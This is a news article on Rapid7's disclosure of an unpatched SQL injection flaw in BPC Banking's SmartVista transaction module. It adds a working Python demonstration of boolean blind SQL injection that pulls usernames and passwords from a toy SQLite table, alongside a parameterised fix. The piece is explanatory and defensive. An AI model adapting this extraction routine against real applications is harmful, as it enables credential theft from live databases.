Rapid7 has gone public with news of an e-commerce SQL injection vulnerability, saying it couldn’t raise a response from the vendor.
The software in question, SmartVista, is an e-commerce and financial product from BPC Banking, and in its disclosure post Rapid7 says it first told the company about the issue in May 2017.
The US CERT Coordination Centre and SwissCERT joined the security company’s effort to alert the Switzerland-based vendor in July and August, ahead of yesterday’s disclosure.
Exploiting the vulnerability requires authenticated access to the front end (SmartVista's transaction module), but from there an attacker can reach far more sensitive data: "A successful exploitation can yield sensitive data, including usernames and passwords of the database backend".

That's because the front end doesn't sanitise the card number or account number input fields used in the transaction module, so what a user types there ends up inside the query sent to the backend database.
An attacker adept at scripting could go a long way, the post explains:
“To access usernames and encrypted passwords in the DBA_USERS table of database SYS (Oracle specific), one could craft a series of database queries to ask true/false statements such as ‘Does the first character, of the first row, in the user’s column start with a?’
“On a true response, the transaction values would be returned, indicating that the first character does indeed start with ‘a’. On a false reply, no data would be returned, and the automated system could move on to the next character. This could continue until the full username has been discovered, as well as the password.”
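The character-by-character extraction Rapid7 describes is a textbook boolean-based blind SQL injection. The following is an added example, not code from Rapid7's post or from BPC Banking, and it does not touch SmartVista or Oracle at all: it stands up an in-memory SQLite database with a constructed `users` table (a stand-in for the Oracle `DBA_USERS` view mentioned above, under an assumed toy schema), a hypothetical `lookup_vulnerable()` that concatenates the card-number field into its query the way an unsanitised transaction search would, and a `lookup_fixed()` that binds the same value as a parameter. `extract_field()` then recovers a username and password purely from whether the known transaction row comes back or not, exactly the true/false game the quoted text describes, and fails to recover anything against the parameterised version.

```python
import sqlite3
import string

# Constructed sample data (assumption, not real SmartVista/Oracle content):
# a toy credential table standing in for the backend's DBA_USERS.
SAMPLE_USERS = [("svadmin", "s3cr3tHash!"), ("report", "r3p0rt")]
SAMPLE_TRANSACTIONS = [("4111111111111111", 100), ("5500000000000004", 250)]
KNOWN_CARD = "4111111111111111"   # a card number the attacker already knows

def make_db():
    """Build the in-memory database the examples run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE transactions (card_number TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO transactions VALUES (?, ?)", SAMPLE_TRANSACTIONS)
    conn.commit()
    return conn

def lookup_vulnerable(conn, card_number):
    """Hypothetical transaction search: the card-number field is spliced
    straight into the SQL text, so the user controls the WHERE clause."""
    sql = (f"SELECT card_number, amount FROM transactions "
           f"WHERE card_number = '{card_number}'")
    return conn.execute(sql).fetchall()

def lookup_fixed(conn, card_number):
    """The same search with a bound parameter: the input is data, never SQL."""
    return conn.execute(
        "SELECT card_number, amount FROM transactions WHERE card_number = ?",
        (card_number,)).fetchall()

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def oracle(lookup, conn, condition):
    """Boolean oracle: True if the injected condition keeps the known
    transaction row in the result, False if the query returns nothing."""
    payload = f"{KNOWN_CARD}' AND ({condition}) AND '1'='1"
    return len(lookup(conn, payload)) > 0

def extract_field(lookup, conn, column, row, max_len=32):
    """Recover one value of one row by asking only true/false questions.
    Returns '' when the oracle never answers True (e.g. against lookup_fixed)."""
    target = f"(SELECT {column} FROM users ORDER BY rowid LIMIT 1 OFFSET {row})"
    value = ""
    for pos in range(1, max_len + 1):
        # Stop once the value is shorter than the position being probed.
        if not oracle(lookup, conn, f"LENGTH({target}) >= {pos}"):
            break
        for ch in ALPHABET:
            # Compare code points so quotes in the alphabet need no escaping.
            cond = f"UNICODE(SUBSTR({target}, {pos}, 1)) = {ord(ch)}"
            if oracle(lookup, conn, cond):
                value += ch
                break
        else:
            raise RuntimeError(f"character at position {pos} not in alphabet")
    return value

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:", extract_field(lookup_vulnerable, conn, "username", 0),
          extract_field(lookup_vulnerable, conn, "password", 0))
    print("fixed:     ", repr(extract_field(lookup_fixed, conn, "username", 0)))
```

Each recovered character costs at most one query per alphabet entry, so the automation is cheap; the only thing stopping it in the parameterised version is that the payload is compared as a literal card number and never matches. That is why the real fix is binding parameters (or an equivalent safe query API) in the transaction module, with a WAF at best buying time.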
The lesson for corporate security managers is to strengthen password complexity, account lockout policies and intrusion detection across all systems, and to tighten access-control rules on every device; remote management must never be opened to all Internet IP addresses.
Since there's no public acknowledgement of the bug, Rapid7 suggests companies using the software contact BPC Banking. A suitably tuned web application firewall can block many SQL injection attempts in the meantime, though it is a mitigation, not a fix for the missing input handling.
Technology is a double-edged sword: technical staff should take care not to break the law or cross the authorities, or they may end up landing themselves in prison.